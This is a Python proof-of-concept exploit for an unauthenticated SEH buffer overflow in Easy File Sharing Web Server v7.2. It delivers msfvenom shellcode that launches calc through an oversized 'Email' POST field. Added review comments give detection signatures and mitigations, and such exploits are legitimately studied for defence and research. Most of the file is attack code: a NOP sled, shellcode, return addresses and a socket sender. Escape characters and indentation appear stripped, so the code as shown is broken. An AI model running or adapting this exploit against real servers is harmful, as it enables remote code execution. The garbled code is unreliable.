#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server v7.2 - POST 'Email' Unauthenticated Remote Buffer Overflow
# Exploit Author: boku (aka Bobby Cooke)
# Date: February 7th, 2020
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested On: Microsoft Windows 10 Home - 10.0.18363 Build 18263 - x64-based PC
# Microsoft Windows 10 Home - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Pro - 10.0.18363 Build 18363 - x86-based PC
# Microsoft Windows 10 Edu - 10.0.18363 Build 18363 - x86-based PC
# About: Easy File Sharing Web Server v7.2 suffers from a stack buffer overflow. This overflow can be triggered from an unauthenticated,
# remote user via a malformed HTTP POST request. The application fails to properly handle the 'Email' parameter when sending a malformed
# POST request to /login.htm. This POST request is triggered from the /register.ghp page, when completing the registration form to create
# an account. The application has front-end javascript code that attempts to mitigate this, but the js is easily bypassed by sending to the
# socket directly.
# Recreate:
# 1) Download & install Easy File Sharing Web Server v7.2
# 2) Open the Application, the HTTP server should begin running on ports 80 & 443
# 3) Change the 'host' variable below to the target device's IP
# 4) Run this python script
# 5) The program will crash and calculator will open
import socket

# --- Review notes (defender's view) ---
# What this proof of concept shows: a single, unauthenticated HTTP POST to /login.htm whose
# 'Email' form field is roughly 4 KB (the comment below places the SEH boundary at 4028 bytes,
# the EIP overwrite at offset 4008) is enough to corrupt the server's stack. The front-end
# JavaScript check mentioned in the header is client-side only and offers no protection.
# Detection: alert on POST /login.htm (application/x-www-form-urlencoded) where the Email value
# is thousands of bytes long or contains non-printable bytes; a legitimate address is well under
# 256 characters. The Referer (/register.ghp) and the fixed Cookie values below are weak
# fingerprints only - an attacker can change them freely.
# Mitigation: server-side length validation of the Email field is the real fix; until the
# product is patched, keep it off untrusted networks and restrict access to ports 80/443.

# Target address and TCP port of the vulnerable web server (header step 3 says to edit 'host').
host = "192.168.70.134"
port = 80

# Padding sled that precedes the shellcode in the oversized Email value.
nops = 'x90'*200
# Bad char = x00,x3b
# Expanding the buffer past 4028 bytes causes SEH to trigger
# root@kali# msfvenom -p windows/exec CMD=calc -b 'x00x3b' -f python -v shellcode
# Payload size: 216 bytes
shellcode = b""
shellcode += b"xdaxcfxbex33x02x8ex27xd9x74x24xf4"
shellcode += b"x5ax33xc9xb1x30x31x72x18x83xc2x04"
shellcode += b"x03x72x27xe0x7bxdbxafx66x83x24x2f"
shellcode += b"x07x0dxc1x1ex07x69x81x30xb7xf9xc7"
shellcode += b"xbcx3cxafxf3x37x30x78xf3xf0xffx5e"
shellcode += b"x3ax01x53xa2x5dx81xaexf7xbdxb8x60"
shellcode += b"x0axbfxfdx9dxe7xedx56xe9x5ax02xd3"
shellcode += b"xa7x66xa9xafx26xefx4ex67x48xdexc0"
shellcode += b"xfcx13xc0xe3xd1x2fx49xfcx36x15x03"
shellcode += b"x77x8cxe1x92x51xddx0ax38x9cxd2xf8"
shellcode += b"x40xd8xd4xe2x36x10x27x9ex40xe7x5a"
shellcode += b"x44xc4xfcxfcx0fx7exd9xfdxdcx19xaa"
shellcode += b"xf1xa9x6exf4x15x2fxa2x8ex21xa4x45"
shellcode += b"x41xa0xfex61x45xe9xa5x08xdcx57x0b"
shellcode += b"x34x3ex38xf4x90x34xd4xe1xa8x16xb2"
shellcode += b"xf4x3fx2dxf0xf7x3fx2exa4x9fx0exa5"
shellcode += b"x2bxe7x8ex6cx08x17xc5x2dx38xb0x80"
shellcode += b"xa7x79xddx32x12xbdxd8xb0x97x3dx1f"
shellcode += b"xa8xddx38x5bx6ex0dx30xf4x1bx31xe7"
shellcode += b"xf5x09x52x66x66xd1x95"
# + ECX & SEH offset @ 3996
# Filler sized so that the fields after it land at the fixed offsets documented below.
offsetECX = 'xcc'*(3996-len(nops+shellcode))
CL = 'x42'
CH = 'x3f'
offsetEIP = 'x43'*8
high2bECX = 'x42x42'
# EIP overwrite at offset 4008
# - EBX holds PTR to payload in Heap
# 043A7864 0271836C l.q. ASCII "newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email=Aa0Aa1..
# - Beginning of Payload at [EBX+-x3f] // (0x3f=63b)
# NOTE(review): both return addresses below are hard-coded module addresses (ImageLoad.dll and
# sqlite3.dll per the author's comments), so the technique depends on those modules loading at
# fixed addresses. Whether the installed build ships them without ASLR/DEP cannot be verified
# from this listing - a defender should confirm it on the deployed version.
ret1 = 'x19x1ex01x10' # 0x10011E19[ImageLoad.dll] # add byte ptr ds:[ebx], ch # ret
# - After EIP overwrite ret, ESP is at +16 bytes
offsetRet2 = 'x42'*12
ret2 = 'x5bx02xc4x61' # 0x61c4025b[sqlite3.dll] # jmp [ebx]
# Full Email value: sled, shellcode, filler, then the register/SEH/EIP control fields.
payload = nops+shellcode+offsetECX+CL+CH+high2bECX+offsetEIP+ret1+offsetRet2+ret2

# Hand-built HTTP request mimicking the browser's registration-form POST from /register.ghp.
# Detection note: no Content-Length header is sent, and the Email field is multi-kilobyte -
# both deviate from what a real browser form submission looks like and make a usable
# WAF/IDS signature.
httpRequest = "POST /login.htm HTTP/1.1 "
httpRequest += "Host: "+host+" "
httpRequest += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 "
httpRequest += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
httpRequest += "Accept-Language: en-US,en;q=0.5 "
httpRequest += "Accept-Encoding: gzip, deflate "
httpRequest += "Referer: http://"+host+"/register.ghp "
httpRequest += "Content-Type: application/x-www-form-urlencoded "
httpRequest += "Connection: close "
httpRequest += "Cookie: SESSIONID=16065; UserID=; PassWD=; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201 "
httpRequest += "Upgrade-Insecure-Requests: 1 "
httpRequest += "frmLogin=true&frmUserID=newUser&frmUserPass=newPassword&frmUserPass2=newPassword&Email="+payload+"&Avatar=&avatarURL=&register=Register%21 "

# Plain TCP client; the request is written once and the script exits.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# NOTE(review): the bare except swallows every exception (including KeyboardInterrupt) and
# prints a generic message, so failures are not diagnosable; the socket is never closed.
# socket.connect() returns None, so 'connect' carries no information.
try:
connect = s.connect((host, port))
print("[+] Successfully connected to "+host)
s.send(httpRequest)
print("[+] Payload Sent")
except:
print("Failure to launch")